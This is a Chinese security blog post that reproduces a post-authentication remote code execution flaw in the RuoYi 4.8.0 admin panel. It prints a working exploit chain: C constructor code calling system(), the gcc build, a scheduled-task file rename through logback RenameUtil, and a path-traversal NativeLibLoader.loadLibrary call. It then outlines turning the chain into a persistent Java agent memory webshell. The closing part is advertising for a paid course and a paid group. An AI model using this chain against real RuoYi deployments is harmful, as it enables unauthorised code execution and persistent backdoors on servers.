若依4.8.0后台rce漏洞复现及内存马利用

若依4.8.0后台rce漏洞复现及内存马利用

原创 跟着斯叔唠安全 跟着斯叔唠安全 2025-05-20 00:00

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1

Start

前段时间先知(
https://xz.aliyun.com/news/17890)上看到有佬发了最新版若依4.8.0的后台rce分析,最近抽空复现了一下。

2

Action

首先创建一个c文件,用来执行命令

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
__attribute__ ((__constructor__)) void angel (void) {
    // 调用 system 函数打开计算器应用程序
    system("open -a calculator");
}

然后使用gcc进行编译

gcc -arch arm64 -shared -o 1.dylib calc.c
//根据不同的架构修改

然后上传这个1.dylib文件

然后创建一个计划任务将
txt格式改成
dylib格式

ch.qos.logback.core.rolling.helper.RenameUtil.renameByCopying("/Users/mos/Desktop/code/java/RuoYi-4.8.0/upload/upload/2025/05/19/com.ruoyi.quartz.task_20250519214440A001.txt","/Users/mos/Desktop/code/java/RuoYi-4.8.0/upload/upload/2025/05/19/com.ruoyi.quartz.task_20250519214440A001.dylib");

执行一次

几乎是瞬间,文件名从txt改成了dylib

最后再将计划任务的代码改成

com.sun.glass.utils.NativeLibLoader.loadLibrary('../../../../../../../../../../../Users/mos/Desktop/code/java/RuoYi-4.8.0/upload/upload/2025/05/19/com.ruoyi.quartz.task_20250519214440A001');

执行一次,然后就弹出来计算器了。

漏洞复现难度倒不是很大,主要就是利用的条件比较苛刻,需要知道文件上传的绝对路径,基本现实中碰到就得靠点狗运成分去猜路径。

前面是漏洞复现的步骤,漏洞利用的话,要么是反弹shell,要么就是往里面种内存马写webshell来连接。反弹shell需要目标机器出网,利用条件有限制,种内存马是相对来说更通用些的手段。那么如何种内存马呢?

回顾一下整个漏洞的过程,其主要是是依靠执行C语言代码来执行命令的,看起来更适合搞agent的内存马。那么思路清晰,只需要将agent马写在C的代码里面,然后当执行这个C语言代码的时候落地agent的jar包,执行agent找到对应的若依pid即可。有了对应的思路,代码实现其实就可以交给AI了。(
这里面碰到了个坑点,不知道是本地环境原因还是什么,使用jmg生成的agent马死活注入不进去内存马,木的办法只得手写了一个agent马注入,agent马获取方式见文末)

按照前面漏洞复现的逻辑,再走一遍。。。顺利写入内存马

========================================================

逆向加解密算法,是渗透测试、漏洞挖掘中非常常见的场景。不少安全从业者都栽在了 Web、APP、小程序中的各种加解密逻辑上。要么绕不过去,要么耗时耗力搞不定,web加解密都要定位半天?

为了解决这个问题,我们推出了这门课程:

🎯 《加解密逆向技能速成培训》

这是一门定位非常清晰的速成实战课。我们不教你写算法,我们教你如何“用好”算法。实战教学,如何用最高效的方式快速逆向加解密。

✅ 课程定价

仅需 99 元,一次性掌握Web/APP/小程序多端逆向技能。

🎁 限时赠送内容(非常硬核)

✅ 一年纷传圈子,专人答疑+资料分享

✅ 魔改 Frida,能绕过市面绝大多数 Frida 检测

✅ 小程序 RPC ,助力你打通小程序体系的算法逆向

🧠 课程内容简介

📌 加解密插件介绍

快速接入主流插件,加快定位和分析速度

📌 小程序加解密逆向

如何定位加密逻辑

使用 RPC 模块快速调试

处理固定动态 key 的实际思路和案例

📌 Web 加解密逆向

手工 + 工具双路线,一键定位,绝杀加密

搭配 RPC 框架高效完成 JSHook

定位常见 Web 加密套路

📌 APP 加解密逆向

利用“算法自吐”技巧快速获取关键数据

手工配合 RPC 脚本进行有效调试

抓住动态 key + 多态混淆的实际处理技巧

💬 课程定位说明

这不是爬虫课程。我们不花大量时间去研究 AES、RSA、SM4等等算法是如何实现的。我们要做的是:

✅ 把这些算法直接利用起来,为渗透服务

✅ 提升调试、hook、定位、利用能力

✅ 实现“实战优先”,“效率为王”,快速赋能

📩 报名方式:

添加下方微信

3

End

🚀 新圈子上线 | 高质量安全内容持续更新中!

我最近在纷传上建立了一个全新的安全技术圈子,主要聚焦于 WEB安全、APP安全、代码审计、漏洞分享
 等核心方向。目前圈子刚刚建立,内容还不算多,但会持续高频更新
,只分享真正有价值、有深度的干货文章。

📚 圈子中包含:
– 高质量原创或精选的安全技术文章

  • 公众号历史付费内容免费查看(如:小程序RPC、APP抓包解决方案)

  • 一些只在圈子内分享的独家思路和实战经验

文章中涉及的完整思路报告(windows版)及agent马等已上传至纷传圈子中,需要的师傅可以自取哈